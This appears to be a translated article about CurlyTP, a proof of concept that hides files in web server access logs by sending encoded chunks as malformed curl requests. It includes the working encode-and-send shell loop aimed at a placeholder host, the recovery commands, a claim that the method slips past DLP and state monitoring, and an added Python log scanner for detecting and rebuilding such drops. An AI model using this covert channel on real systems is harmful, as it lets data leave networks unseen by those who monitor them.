Secret messaging through server logs

According to the definition on Wikipedia, a dead drop is a tradecraft technique for exchanging information or objects between people through a secret location. The point is that the people never meet, yet they still exchange information while maintaining operational security.



The drop should not attract attention. That is why, in the offline world, inconspicuous things are usually used: a loose brick in a wall, a library book, or a hollow in a tree.



There are many tools on the Internet for encryption and anonymization, but the very fact of using them attracts attention. In addition, they can be blocked at the corporate or state level. What can be done?



Developer Ryan Flowers suggested an interesting option: use any web server as a dead drop. If you think about it, what does a web server do? It accepts requests, serves files and writes a log. And it writes every request to the log, even malformed ones!



It turns out that any web server lets you store almost any message in its log. Flowers wondered how to make use of that.



He offers this option:



  1. We take a text file (the secret message) and compute its hash (md5sum).

  2. We encode it (gzip + uuencode).

  3. We write it to the log by sending deliberately malformed requests to the server.


Local:

  [root@local ~]# md5sum g.txt
  a8be1b6b67615307e6af8529c2f356c4  g.txt
  [root@local ~]# gzip g.txt
  [root@local ~]# uuencode -m g.txt.gz g.txt.gz.uue > g.txt.gz.uue
  [root@local ~]# IFS=$'\n'; for x in `cat g.txt.gz.uue | sed 's/ /=+=/g'`; do echo curl -s "http://domain.com/?transfer?g.txt.gz.uue?$x"; done | sh
      
      





To read the file, you perform these operations in reverse order: decode and unzip the file, then verify the hash (the hash can be safely transmitted over open channels).



Spaces are replaced by =+= so that there are no spaces in the URL. The program, which the author called CurlyTP, uses base64 encoding, as in email attachments. Each request carries the keyword ?transfer? so that the recipient can easily find the lines in the logs.



What do we see in the logs in this case?



  1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
  1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
  1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"
      
      





As already mentioned, to receive the secret message you perform the operations in reverse order:



Remote machine:

  [root@server /home/domain/logs]# grep transfer access_log | grep 21:12 | awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
  [root@server /home/domain/logs]# uudecode -o g.txt.gz g.txt.gz.uue
  [root@server /home/domain/logs]# gunzip g.txt.gz
  [root@server /home/domain/logs]# md5sum g.txt
  a8be1b6b67615307e6af8529c2f356c4  g.txt
      
      





The process is easy to automate. The md5sum matches, and the contents of the file confirm that everything was decoded correctly.
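The same log lines that let the recipient recover the message also let a log reviewer spot the drop. The following is an added example written for this page, not code from the article or from CurlyTP: a Python scanner for Apache/nginx combined-format access logs that flags requests carrying uuencode markers or long high-entropy base64-like tokens, counts them per source address, and, for incident response, rebuilds any complete drop so an analyst can see what actually left the network. The 4.0 bits/char threshold, the file names and the sample lines other than the three shown above are my own constructed assumptions.

```python
import base64
import gzip
import math
import re
from collections import Counter, defaultdict

# Apache/nginx "combined" format: ip ident user [time] "method target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
B64_TOKEN = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')  # long runs of the base64 alphabet
MARKERS = ("begin-base64", "=+=", "====")            # uuencode -m header/trailer and CurlyTP's space substitute
KEYWORD = "transfer"                                 # tag CurlyTP puts in the URL so the receiver can grep for it
ENTROPY_BITS = 4.0                                   # assumed threshold; random base64 text sits near 5-6 bits/char


def shannon_entropy(s: str) -> float:
    """Bits per character of a string (0.0 for the empty string)."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def parse_line(line: str):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_query(target: str):
    """Classify one request target (path + query); returns (is_suspicious, reason)."""
    query = target.partition("?")[2]
    for marker in MARKERS:
        if marker in query:
            return True, f"uuencode/CurlyTP marker {marker!r} in query string"
    for tok in B64_TOKEN.findall(query):
        ent = shannon_entropy(tok)
        if ent >= ENTROPY_BITS:
            return True, f"{len(tok)}-char base64-like token at {ent:.2f} bits/char"
    return False, ""


def scan(lines):
    """Detection pass: one finding per suspicious request plus a per-source-IP count."""
    findings, per_ip = [], Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hit, reason = suspicious_query(rec["target"])
        if hit:
            findings.append({"ip": rec["ip"], "time": rec["time"], "target": rec["target"], "reason": reason})
            per_ip[rec["ip"]] += 1
    return findings, per_ip


def reconstruct(lines, keyword=KEYWORD):
    """Forensics pass: rebuild files dropped as /?<keyword>?<name>?<encoded line> requests.
    A drop is decoded only if its uuencode '====' trailer was logged; otherwise it is reported as partial."""
    chunks = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        parts = rec["target"].split("?") if rec else []  # ['/', keyword, name, payload]
        if len(parts) >= 4 and parts[1] == keyword:
            chunks[parts[2]].append(parts[3].replace("=+=", " "))
    results = {}
    for name, body in chunks.items():
        if not body[0].startswith("begin-base64") or body[-1] != "====":
            results[name] = {"status": "partial", "lines": len(body)}
            continue
        try:
            raw = base64.b64decode("".join(body[1:-1]), validate=True)
            results[name] = {"status": "ok", "data": gzip.decompress(raw)}
        except (ValueError, OSError, EOFError) as exc:
            results[name] = {"status": "error", "detail": str(exc)}
    return results


def make_drop_lines(message: bytes, name: str, ip: str = "1.2.3.4"):
    """Constructed test input: emulate gzip + uuencode -m + one GET per encoded line, as CurlyTP does."""
    b64 = base64.b64encode(gzip.compress(message, mtime=0)).decode()
    rows = ["begin-base64 644 " + name] + [b64[i:i + 60] for i in range(0, len(b64), 60)] + ["===="]
    return [f'{ip} - - [22/Aug/2019:21:12:{i % 60:02d} -0400] "GET /?{KEYWORD}?{name}?{row.replace(" ", "=+=")} '
            f'HTTP/1.1" 200 4050 "-" "curl/7.29.0"' for i, row in enumerate(rows)]


# The three requests shown in the article (an incomplete drop) plus constructed ordinary traffic.
PAGE_LINES = [
    '1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"',
    '1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"',
    '1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"',
]
BENIGN_LINES = [
    '10.0.0.7 - - [22/Aug/2019:21:13:00 -0400] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [22/Aug/2019:21:13:02 -0400] "GET /search?q=hollow+tree&page=2 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [22/Aug/2019:21:13:05 -0400] "GET /api/items?id=42&sort=name HTTP/1.1" 404 210 "-" "curl/7.29.0"',
]

if __name__ == "__main__":
    sample = PAGE_LINES + BENIGN_LINES + make_drop_lines(b"meet at the loose brick, 21:00\n", "note.txt.gz")
    findings, per_ip = scan(sample)
    for f in findings:
        print(f'{f["ip"]} {f["time"]} {f["reason"]}')
    print("requests per source:", dict(per_ip))
    for name, res in reconstruct(sample).items():
        print(name, res)
```

The entropy heuristic is deliberately loose: a single 60-character base64 token in a query string is not proof of anything, but dozens of them from one source in a few seconds, all under the same path prefix, is the shape to alert on, which is why scan() returns the per-IP count alongside the individual findings. The reconstruct() step is for the responder, not the recipient: once a drop is flagged, decoding it from the log tells you exactly what was passed through the server.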



The method is very simple. “The point of this exercise is only to prove that files can be transferred through innocent-looking small web requests, and it works on any web server with plain text logs. In fact, every web server is a dead drop!” writes Flowers.



Of course, the method only works if the recipient has access to the server logs. But such access is provided, for example, by many hosting providers.



How to use it?



Ryan Flowers says he is not an information security specialist and will not draw up a list of possible applications of CurlyTP. For him, this is just a proof of concept that the familiar tools we see every day can be used in an unconventional way.



In fact, this method has several advantages over other server-side "dead drops" such as Digital Dead Drop or PirateBox: it requires no special configuration on the server side and no special protocols, and it will not arouse suspicion among those who monitor the traffic. It is unlikely that SORM or a DLP system will scan URLs for compressed text files.



This is one way to send messages through service files. You may recall how some forward-thinking companies used to post job openings for developers in HTTP headers or in the HTML source of their pages.







The idea was that only web developers would see such an “easter egg”, since an ordinary user would never look at the headers or the HTML source.





